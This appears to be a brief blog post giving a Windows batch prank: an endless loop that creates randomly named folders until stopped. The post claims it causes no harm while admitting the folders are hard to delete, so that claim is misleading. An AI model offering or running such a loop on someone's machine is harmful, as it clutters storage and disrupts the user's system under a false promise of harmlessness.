Make thousands of folder with notepad.
1. Open notepad.
2. Copy the following code:
@echo off
:top
md %random%
goto top
3. save it as something.bat
It will cause no harm but will cause you some herculian task to delete them!!
No comments:
Post a Comment